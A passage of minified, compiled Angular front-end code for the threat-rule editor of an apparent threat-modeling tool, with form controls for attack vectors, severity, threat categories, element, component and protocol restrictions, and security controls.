"),ne(2,gIe,6,3,"mat-option",47),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.GroupName),g(2),F("ngForOf",e.Properties)}}function yIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.ReceiverInterfaceRestriction.Property.Value=n)}),u(),s(3,"\n "),Mt()}if(2&t){const e=V(2).$implicit;g(2),F("ngModel",e.ReceiverInterfaceRestriction.Property.Value)}}function bIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(6);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function MIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"select",54),he("change",function(n){be(e);const r=V(2).$implicit;return Me(V(3).SetLWH(r.ReceiverInterfaceRestriction.Property,n.target.value))}),s(3,"\n "),ne(4,bIe,3,4,"option",11),s(5,"\n "),u(),s(6,"\n "),Mt()}if(2&t){const e=V(2).$implicit,i=V(3);g(2),F("ngModel",e.ReceiverInterfaceRestriction.Property.Value),g(2),F("ngForOf",i.GetLMHValues())}}function vIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",51),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().$implicit.ReceiverInterfaceRestriction.Property.ID=n)}),s(9,"\n "),ne(10,CIe,4,2,"mat-optgroup",6),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(V(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n "),ne(17,yIe,4,1,"ng-container",16),s(18,"\n "),ne(19,MIe,7,2,"ng-container",16),s(20,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(3);g(5),ke(re(6,6,"general.PropertyName")),g(3),F("value",e.ReceiverInterfaceRestriction.Property.ID),g(2),F("ngForOf",i.GetAvailableInterfacePropertyGroups(e)),g(5),ct("\n ",e.PropertyRest.ComparisonType,"\n "),g(2),F("ngIf","Check Box"==i.GetPropertyEditType(e)),g(2),F("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function AIe(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=V().$implicit;g(1),ct("\n ",e.IsOR?"OR":"AND","\n ")}}function TIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.NodeNumber=n)}),s(11,"\n "),ne(12,B8e,2,2,"mat-option",11),s(13,"\n "),u(),s(14,"\n "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(V(3).RemoveDFDNodeRestriction(r))}),oe(16,"translate"),s(17,"\n "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n "),u(),s(21,"\n "),u(),s(22,"\n "),m(23,"mat-form-field",51),s(24,"\n "),m(25,"mat-label"),s(26),oe(27,"translate"),u(),s(28,"\n "),m(29,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(30,"\n "),ne(31,H8e,3,4,"mat-option",47),s(32,"\n "),u(),s(33,"\n "),u(),s(34,"\n "),s(35,"\n "),ne(36,X8e,21,8,"ng-container",16),s(37,"\n "),s(38,"\n "),ne(39,J8e,15,8,"mat-form-field",60),s(40,"\n "),s(41,"\n "),ne(42,rIe,18,7,"ng-container",16),s(43,"\n "),s(44,"\n "),ne(45,fIe,21,8,"ng-container",16),s(46,"\n "),s(47,"\n "),ne(48,vIe,21,8,"ng-container",16),s(49,"\n\n "),ne(50,AIe,2,1,"button",49),s(51,"\n "),u()}if(2&t){const e=a.$implicit,i=a.last,n=V(3);g(2),ri("padding-left",n.GetLayerPadding(e)),g(3),ke(re(6,16,"general.Element")),g(3),F("ngModel",e.Layer),g(2),F("value",e.NodeNumber),g(2),F("ngForOf",n.GetRuleElements()),g(3),at("matTooltip",re(16,18,"general.Delete")),g(11),ke(re(27,20,"general.Type")),g(3),F("value",e.RestType),g(2),F("ngForOf",n.GetAvailableRestrictionsTypes(e)),g(5),F("ngIf",1==e.RestType),g(3),F("ngIf",2==e.RestType),g(3),F("ngIf",3==e.RestType),g(3),F("ngIf",10==e.RestType),g(3),F("ngIf",11==e.RestType),g(2),F("ngIf",!i)}}function EIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"div"),s(3,"\n "),m(4,"mat-form-field",4),s(5,"\n "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"mat-select",10),he("valueChange",function(n){return be(e),Me(V(2).threatRule.DFDRestriction.Target=n)}),s(11,"\n "),ne(12,P8e,2,2,"mat-option",11),s(13,"\n "),u(),s(14,"\n "),u(),s(15,"\n "),it(16,"br"),s(17,"\n "),ne(18,V8e,25,10,"ng-container",45),s(19,"\n "),m(20,"button",55),he("click",function(){be(e);const n=V(2);return Me(n.threatRule.DFDRestriction.AppliesReverse=!n.threatRule.DFDRestriction.AppliesReverse)}),oe(21,"translate"),s(22,"\n "),m(23,"mat-icon",56),s(24,"swap_horiz"),u(),s(25,"\n "),u(),s(26,"\n "),it(27,"br"),s(28),oe(29,"translate"),m(30,"button",43),he("click",function(){return be(e),Me(V(2).AddDFDNodeRestriction())}),oe(31,"translate"),s(32,"\n "),m(33,"mat-icon"),s(34,"add"),u(),s(35,"\n "),u(),s(36,"\n "),m(37,"span",44),s(38),u(),s(39,"\n "),m(40,"div"),s(41,"\n "),ne(42,TIe,52,22,"div",45),s(43,"\n "),u(),s(44,"\n "),u(),s(45,"\n "),u()}if(2&t){const e=V(2);g(7),ke(re(8,13,"general.Target")),g(3),F("value",e.threatRule.DFDRestriction.Target),g(2),F("ngForOf",e.GetRuleElements()),g(6),F("ngForOf",e.threatRule.DFDRestriction.NodeTypes),g(2),at("matTooltip",re(21,15,"pages.config.threatrule.applyReverse")),g(3),Ct("btn-selected-light",!e.theme.IsDarkMode&&e.threatRule.DFDRestriction.AppliesReverse)("btn-selected-dark",e.theme.IsDarkMode&&e.threatRule.DFDRestriction.AppliesReverse),g(5),ct("\n ",re(29,17,"properties.Restrictions")," \n "),g(2),at("matTooltip",re(31,19,"general.Add")),g(8),ke(e.GetRestrictionString()),g(4),F("ngForOf",e.threatRule.DFDRestriction.NodeRestrictions)}}function DIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V().$implicit;return Me(V(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ct("\n ",re(2,2,i.GetRestrictionTypeName(e)),"\n ")}}function xIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function wIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function IIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3).$implicit;return Me(V(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n "),ne(2,xIe,3,3,"ng-container",16),s(3,"\n "),ne(4,wIe,2,1,"ng-container",16),s(5,"\n "),u()}if(2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function RIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,IIe,6,3,"mat-option",47),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.GroupName),g(2),F("ngForOf",e.Properties)}}function SIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n "),Mt()}if(2&t){const e=V(2).$implicit;g(2),F("ngModel",e.PropertyRest.Value)}}function kIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(6);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function PIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"select",54),he("change",function(n){be(e);const r=V(2).$implicit;return Me(V(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n "),ne(4,kIe,3,4,"option",11),s(5,"\n "),u(),s(6,"\n "),Mt()}if(2&t){const e=V(2).$implicit,i=V(3);g(2),F("ngModel",e.PropertyRest.Value),g(2),F("ngForOf",i.GetLMHValues())}}function OIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",51),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().$implicit.PropertyRest.ID=n)}),s(9,"\n "),ne(10,RIe,4,2,"mat-optgroup",6),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(V(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n "),ne(17,SIe,4,1,"ng-container",16),s(18,"\n "),ne(19,PIe,7,2,"ng-container",16),s(20,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(3);g(5),ke(re(6,6,"general.PropertyName")),g(3),F("value",e.PropertyRest.ID),g(2),F("ngForOf",i.GetAvailablePropertyGroups(e)),g(5),ct("\n ",e.PropertyRest.ComparisonType,"\n "),g(2),F("ngIf","Check Box"==i.GetPropertyEditType(e)),g(2),F("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function NIe(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=V().$implicit;g(1),ct("\n ",e.IsOR?"OR":"AND","\n ")}}function LIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n "),ne(12,DIe,3,4,"mat-option",47),s(13,"\n "),u(),s(14,"\n "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(V(3).RemoveComponentRestriction(r))}),oe(16,"translate"),s(17,"\n "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n "),u(),s(21,"\n "),u(),s(22,"\n "),s(23,"\n "),ne(24,OIe,21,8,"ng-container",16),s(25,"\n "),ne(26,NIe,2,1,"button",49),s(27,"\n "),u()}if(2&t){const e=a.$implicit,i=a.last,n=V(3);g(2),ri("padding-left",n.GetLayerPadding(e)),g(3),ke(re(6,9,"general.Type")),g(3),F("ngModel",e.Layer),g(2),F("value",e.RestType),g(2),F("ngForOf",n.GetAvailableRestrictionsTypes(e)),g(3),at("matTooltip",re(16,11,"general.Delete")),g(9),F("ngIf",1==e.RestType),g(2),F("ngIf",!i)}}function zIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",41),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),it(8,"input",42),s(9,"\n "),u(),s(10,"\n "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(V(2).AddComponentRestriction())}),oe(15,"translate"),s(16,"\n "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"span",44),s(22),u(),s(23,"\n "),m(24,"div"),s(25,"\n "),ne(26,LIe,28,13,"div",45),s(27,"\n "),u(),s(28,"\n "),u()}if(2&t){const e=V(2);g(5),ke(re(6,8,"properties.ComponentType")),g(3),at("matTooltip",null==e.selectedComponentType?null:e.selectedComponentType.Name),F("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedComponentType?null:e.selectedComponentType.Name),g(4),ct("\n ",re(13,10,"properties.Restrictions")," \n "),g(2),at("matTooltip",re(15,12,"general.Add")),g(8),ke(e.GetRestrictionString()),g(4),F("ngForOf",e.threatRule.ComponentRestriction.DetailRestrictions)}}function WIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V().$implicit;return Me(V(3).CreatePropertyRestrictionType(c,r))}),s(1),oe(2,"translate"),u()}if(2&t){const e=a.$implicit,i=V(4);F("value",e),g(1),ct("\n ",re(2,2,i.GetRestrictionTypeName(e)),"\n ")}}function FIe(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=V().$implicit;g(1),ke(re(2,1,e.DisplayName))}}function VIe(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V().$implicit;g(1),ke(e.ID)}}function BIe(t,a){if(1&t){const e=Ye();m(0,"mat-option",50),he("click",function(){const r=be(e).$implicit,c=V(3).$implicit;return Me(V(3).SetPropertyDefaultValue(c.PropertyRest,r))}),s(1,"\n "),ne(2,FIe,3,3,"ng-container",16),s(3,"\n "),ne(4,VIe,2,1,"ng-container",16),s(5,"\n "),u()}if(2&t){const e=a.$implicit;F("value",e.ID),g(2),F("ngIf",e.DisplayName),g(2),F("ngIf",!e.DisplayName)}}function HIe(t,a){if(1&t&&(m(0,"mat-optgroup",33),s(1,"\n "),ne(2,BIe,6,3,"mat-option",47),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.GroupName),g(2),F("ngForOf",e.Properties)}}function UIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",53),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.PropertyRest.Value=n)}),u(),s(3,"\n "),Mt()}if(2&t){const e=V(2).$implicit;g(2),F("ngModel",e.PropertyRest.Value)}}function qIe(t,a){if(1&t&&(m(0,"option",34),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(6);F("value",e),g(1),ke(re(2,2,i.GetLMHName(e)))}}function GIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"select",54),he("change",function(n){be(e);const r=V(2).$implicit;return Me(V(3).SetLWH(r.PropertyRest,n.target.value))}),s(3,"\n "),ne(4,qIe,3,4,"option",11),s(5,"\n "),u(),s(6,"\n "),Mt()}if(2&t){const e=V(2).$implicit,i=V(3);g(2),F("ngModel",e.PropertyRest.Value),g(2),F("ngForOf",i.GetLMHValues())}}function jIe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",51),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().$implicit.PropertyRest.ID=n)}),s(9,"\n "),ne(10,HIe,4,2,"mat-optgroup",6),s(11,"\n "),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(V(3).OnNextComparisonType(n,n.PropertyRest))}),s(15),u(),s(16,"\n "),ne(17,UIe,4,1,"ng-container",16),s(18,"\n "),ne(19,GIe,7,2,"ng-container",16),s(20,"\n "),Mt()}if(2&t){const e=V().$implicit,i=V(3);g(5),ke(re(6,6,"general.PropertyName")),g(3),F("value",e.PropertyRest.ID),g(2),F("ngForOf",i.GetAvailablePropertyGroups(e)),g(5),ct("\n ",e.PropertyRest.ComparisonType,"\n "),g(2),F("ngIf","Check Box"==i.GetPropertyEditType(e)),g(2),F("ngIf","Low Medium High Select"==i.GetPropertyEditType(e))}}function QIe(t,a){if(1&t){const e=Ye();m(0,"button",52),he("click",function(){be(e);const n=V().$implicit;return Me(n.IsOR=!n.IsOR)}),s(1),u()}if(2&t){const e=V().$implicit;g(1),ct("\n ",e.IsOR?"OR":"AND","\n ")}}function $Ie(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",46),he("ngModelChange",function(n){return Me(be(e).$implicit.Layer=n)}),u(),s(9,"\n "),m(10,"mat-select",10),he("valueChange",function(n){return Me(be(e).$implicit.RestType=n)}),s(11,"\n "),ne(12,WIe,3,4,"mat-option",47),s(13,"\n "),u(),s(14,"\n "),m(15,"button",48),he("click",function(){const r=be(e).index;return Me(V(3).RemoveProtocolRestriction(r))}),oe(16,"translate"),s(17,"\n "),m(18,"mat-icon"),s(19,"delete"),u(),s(20,"\n "),u(),s(21,"\n "),u(),s(22,"\n "),s(23,"\n "),ne(24,jIe,21,8,"ng-container",16),s(25,"\n \n "),ne(26,QIe,2,1,"button",49),s(27,"\n "),u()}if(2&t){const e=a.$implicit,i=a.last,n=V(3);g(2),ri("padding-left",n.GetLayerPadding(e)),g(3),ke(re(6,9,"general.Type")),g(3),F("ngModel",e.Layer),g(2),F("value",e.RestType),g(2),F("ngForOf",n.GetAvailableRestrictionsTypes(e)),g(3),at("matTooltip",re(16,11,"general.Delete")),g(9),F("ngIf",1==e.RestType),g(2),F("ngIf",!i)}}function KIe(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",41),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),it(8,"input",42),s(9,"\n "),u(),s(10,"\n "),it(11,"br"),s(12),oe(13,"translate"),m(14,"button",43),he("click",function(){return be(e),Me(V(2).AddProtocolRestriction())}),oe(15,"translate"),s(16,"\n "),m(17,"mat-icon"),s(18,"add"),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"span",44),s(22),u(),s(23,"\n "),m(24,"div"),s(25,"\n "),ne(26,$Ie,28,13,"div",45),s(27,"\n "),u(),s(28,"\n "),u()}if(2&t){const e=V(2);g(5),ke(re(6,8,"general.Protocol")),g(3),at("matTooltip",null==e.selectedProtocol?null:e.selectedProtocol.Name),F("spellcheck",e.dataService.HasSpellCheck)("value",null==e.selectedProtocol?null:e.selectedProtocol.Name),g(4),ct("\n ",re(13,10,"properties.Restrictions")," \n "),g(2),at("matTooltip",re(15,12,"general.Add")),g(8),ke(e.GetRestrictionString()),g(4),F("ngForOf",e.threatRule.ProtocolRestriction.DetailRestrictions)}}function XIe(t,a){if(1&t){const e=Ye();m(0,"button",23),he("click",function(){const r=be(e).$implicit;return Me(V(2).AddExistingControl(r))}),s(1),u()}if(2&t){const e=a.$implicit;g(1),ke(e.Name)}}function YIe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",61),he("click",function(){const r=be(e).$implicit;return Me(V(2).selectedControl=r)}),s(1,"\n "),m(2,"mat-icon",62),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",63),s(6),oe(7,"translate"),u(),s(8,"\n "),m(9,"button",64),he("click",function(){const r=be(e).$implicit;return Me(V(2).RemoveControl(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n "),m(14,"button",65),he("click",function(){const r=be(e).$implicit;return Me(V(2).DeleteControl(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(re(7,8,e.Name)),g(3),at("matTooltip",re(10,10,"general.Remove")),g(5),at("matTooltip",re(15,12,"general.Delete"))}}function JIe(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",67),he("click",function(){const r=be(e).$implicit;return Me(V(3).selectedControl=r)}),s(1,"\n "),m(2,"mat-icon",62),s(3,"security"),u(),s(4,"\n "),m(5,"div",63),s(6),oe(7,"translate"),u(),s(8,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(re(7,6,e.Name))}}function ZIe(t,a){if(1&t&&(bt(0),s(1,"\n "),it(2,"mat-divider"),s(3,"\n "),m(4,"div",20),s(5),oe(6,"translate"),u(),s(7,"\n "),ne(8,JIe,9,8,"mat-list-item",66),s(9,"\n "),Mt()),2&t){const e=V(2);g(5),za("",e.threatRule.AttackVector.Name," ",re(6,3,"general.Controls"),""),g(3),F("ngForOf",e.GetVectorControls())}}function e5e(t,a){if(1&t&&(m(0,"div",68),s(1,"\n "),it(2,"app-control",69),s(3,"\n "),u()),2&t){const e=V(2);g(2),F("control",e.selectedControl)("canEdit",!1)("canEditName",!0)("canEditGroup",!0)}}const t5e=function(){return[1,2]};function i5e(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n "),m(2,"mat-checkbox",2),he("ngModelChange",function(n){return be(e),Me(V().threatRule.IsActive=n)}),s(3),oe(4,"translate"),u(),s(5,"\n "),it(6,"br"),s(7,"\n "),ne(8,t8e,10,6,"mat-form-field",3),s(9,"\n "),m(10,"div"),s(11,"\n "),m(12,"mat-form-field",4),s(13,"\n "),m(14,"mat-label"),s(15),oe(16,"translate"),u(),s(17,"\n "),m(18,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().threatRule.AttackVector=n)})("selectionChange",function(n){return be(e),Me(V().OnAttackVectorChanged(n.value))}),s(19,"\n "),m(20,"mat-option"),s(21),oe(22,"translate"),u(),s(23,"\n "),ne(24,a8e,4,2,"mat-optgroup",6),s(25,"\n "),u(),s(26,"\n "),m(27,"button",7),he("click",function(n){return be(e),V().EditAttackVector(),Me(n.stopPropagation())}),oe(28,"translate"),s(29,"\n "),m(30,"mat-icon"),s(31,"edit"),u(),s(32,"\n "),u(),s(33,"\n "),m(34,"button",8),he("click",function(n){return be(e),V().AddAttackVector(),Me(n.stopPropagation())}),oe(35,"translate"),s(36,"\n "),m(37,"mat-icon"),s(38,"add"),u(),s(39,"\n "),u(),s(40,"\n "),u(),s(41,"\n "),m(42,"mat-form-field",9),s(43,"\n "),m(44,"mat-label"),s(45),oe(46,"translate"),u(),s(47,"\n "),m(48,"mat-select",10),he("valueChange",function(n){return be(e),Me(V().threatRule.Severity=n)}),s(49,"\n "),m(50,"mat-option"),s(51),oe(52,"translate"),u(),s(53,"\n "),ne(54,n8e,3,4,"mat-option",11),s(55,"\n "),u(),s(56,"\n "),u(),s(57,"\n "),ne(58,r8e,20,4,"mat-accordion",12),s(59,"\n "),m(60,"mat-form-field",13),s(61,"\n "),m(62,"mat-label"),s(63),oe(64,"translate"),u(),s(65,"\n "),m(66,"mat-select",14),he("valueChange",function(n){return be(e),Me(V().threatRule.ThreatCategories=n)}),s(67,"\n "),ne(68,c8e,4,2,"mat-optgroup",6),s(69,"\n "),u(),s(70,"\n "),u(),s(71,"\n "),m(72,"mat-form-field",13),s(73,"\n "),m(74,"mat-label"),s(75),oe(76,"translate"),u(),s(77,"\n "),m(78,"textarea",15),he("ngModelChange",function(n){return be(e),Me(V().threatRule.Description=n)}),u(),s(79,"\n "),u(),s(80,"\n "),ne(81,d8e,16,5,"ng-container",16),s(82,"\n "),m(83,"mat-form-field",4),s(84,"\n "),m(85,"mat-label"),s(86),oe(87,"translate"),u(),s(88,"\n "),m(89,"mat-select",14),he("valueChange",function(n){return be(e),Me(V().threatRule.OverridenRules=n)}),s(90,"\n "),ne(91,u8e,4,2,"mat-optgroup",6),s(92,"\n "),u(),s(93,"\n "),u(),s(94,"\n "),it(95,"br"),s(96,"\n "),ne(97,k8e,29,14,"div",16),s(98,"\n "),ne(99,EIe,46,21,"div",16),s(100,"\n "),ne(101,zIe,29,14,"div",16),s(102,"\n "),ne(103,KIe,29,14,"div",16),s(104,"\n "),m(105,"div",17),s(106,"\n "),m(107,"div",18),s(108,"\n "),m(109,"mat-list",19),he("cdkDropListDropped",function(n){be(e);const r=V();return Me(r.dropControl(n,r.GetControls()))}),s(110,"\n "),m(111,"div",20),s(112),oe(113,"translate"),m(114,"button",21),oe(115,"translate"),m(116,"mat-icon"),s(117,"add"),u()(),s(118,"\n "),m(119,"mat-menu",null,22),s(121,"\n "),m(122,"button",23),he("click",function(){return be(e),Me(V().AddControl())}),s(123),oe(124,"translate"),u(),s(125,"\n "),m(126,"button",24),s(127),oe(128,"translate"),u(),s(129,"\n "),u(),s(130,"\n "),m(131,"mat-menu",null,25),s(133,"\n "),ne(134,XIe,2,1,"button",26),s(135,"\n "),u(),s(136,"\n "),u(),s(137,"\n "),ne(138,YIe,19,14,"mat-list-item",27),s(139,"\n "),ne(140,ZIe,10,5,"ng-container",16),s(141,"\n "),u(),s(142,"\n "),u(),s(143,"\n "),m(144,"div",28),s(145,"\n "),ne(146,e5e,4,4,"div",29),s(147,"\n "),u(),s(148,"\n "),u(),s(149,"\n "),u(),s(150,"\n"),u()}if(2&t){const e=Ti(120),i=Ti(132),n=V();let r;Ct("disable",!n.canEdit),g(2),F("ngModel",n.threatRule.IsActive),g(1),ke(re(4,48,"properties.IsActive")),g(5),F("ngIf",n.canEditName),g(2),Ct("disable",!n.threatRule.IsActive),g(5),ke(re(16,50,"general.AttackVector")),g(3),at("matTooltip",null==n.threatRule.AttackVector?null:n.threatRule.AttackVector.Name),F("value",n.threatRule.AttackVector),g(3),ke(re(22,52,"properties.selectNone")),g(3),F("ngForOf",n.GetAttackVectorGroups()),g(3),at("matTooltip",re(28,54,"general.Edit")),F("disabled",!n.threatRule.AttackVector),g(7),at("matTooltip",re(35,56,"general.Add")),g(11),ke(re(46,58,"properties.Severity")),g(3),F("value",n.threatRule.Severity),g(3),ke(re(52,60,"properties.selectNone")),g(3),F("ngForOf",n.GetSeverityTypes()),g(4),F("ngIf",n.showAttackVector&&n.threatRule.AttackVector),g(5),ke(re(64,62,"general.ThreatCategories")),g(3),F("value",n.threatRule.ThreatCategories),g(2),F("ngForOf",n.GetThreatCategoryGroups()),g(7),ke(re(76,64,"properties.Description")),g(3),F("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.threatRule.Description),g(3),F("ngIf",kr(76,t5e).includes(n.threatRule.RuleType)),g(5),ke(re(87,66,"properties.OverridenRules")),g(3),F("value",n.threatRule.OverridenRules),g(2),F("ngForOf",n.GetAvailableThreatRuleGroups()),g(6),F("ngIf",1==n.threatRule.RuleType),g(2),F("ngIf",2==n.threatRule.RuleType),g(2),F("ngIf",3==n.threatRule.RuleType),g(2),F("ngIf",4==n.threatRule.RuleType),g(6),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),g(3),ct("",re(113,68,"general.Controls")," \n "),g(2),at("matTooltip",re(115,70,"general.Add")),F("matMenuTriggerFor",e),g(9),ke(re(124,72,"general.New")),g(3),F("matMenuTriggerFor",i),g(1),ke(re(128,74,"general.Existing")),g(7),F("ngForOf",n.GetPossibleControls()),g(4),F("ngForOf",n.GetControls()),g(2),F("ngIf",(null==(r=n.GetVectorControls())?null:r.length)>0),g(6),F("ngIf",n.selectedControl)}}let qp=(()=>{class t{constructor(e,i,n,r,c){this.theme=i,this.dataService=n,this.dialog=r,this.translate=c,this.canEdit=!0,this.canEditName=!1,this.showAttackVector=!0,this.threatRuleGroups={},this.propertyGroups={},this.phyPropertyGroups={},this.interfacePropertyGroups=null,e&&(this.threatRule=e,this.canEdit=!1)}get threatRule(){return this._threatRule}set threatRule(e){this._threatRule=e,this.selectedRestriction=null,this.propertyGroups={},this.phyPropertyGroups={},this.interfacePropertyGroups=null,this.threatRuleGroups={},this.selectedControl=null}get selectedStencilType(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.StencilRestriction)&&void 0!==i&&i.stencilTypeID)return this.dataService.Config.GetStencilType(this.threatRule.StencilRestriction.stencilTypeID)}get selectedStencilElementType(){var e;return null!==(e=this.selectedStencilType)&&void 0!==e&&e.ElementTypeID?this.dataService.Config.GetStencilElementType(this.selectedStencilType):null}get selectedComponentType(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.ComponentRestriction)&&void 0!==i&&i.componentTypeID)return this.dataService.Config.GetMyComponentType(this.threatRule.ComponentRestriction.componentTypeID)}get selectedProtocol(){var e,i;if(null!==(i=null===(e=this.threatRule)||void 0===e?void 0:e.ProtocolRestriction)&&void 0!==i&&i.protocolID)return this.dataService.Config.GetProtocol(this.threatRule.ProtocolRestriction.protocolID)}ngOnInit(){}OnAttackVectorChanged(e){this.threatRule.ThreatCategories=null==e?void 0:e.ThreatCategories}GetAttackVectorGroups(){return this.dataService.Config.GetAttackVectorGroups().filter(e=>e.AttackVectors.length>0)}GetThreatCategoryGroups(){return this.dataService.Config.GetThreatCategoryGroups().filter(e=>e.ThreatCategories.length>0)}GetAvailableThreatRuleGroups(){if(!this.threatRuleGroups[this.threatRule.RuleType]){let e=[];if(this.threatRule.RuleType==on.Stencil){let i={Name:this.translate.instant("properties.StencilRules"),ThreatRules:this.dataService.Config.GetThreatRules().filter(n=>n.RuleType==on.Stencil&&n.ID!=this.threatRule.ID)};e.push(i)}else if(this.threatRule.RuleType==on.Component){let 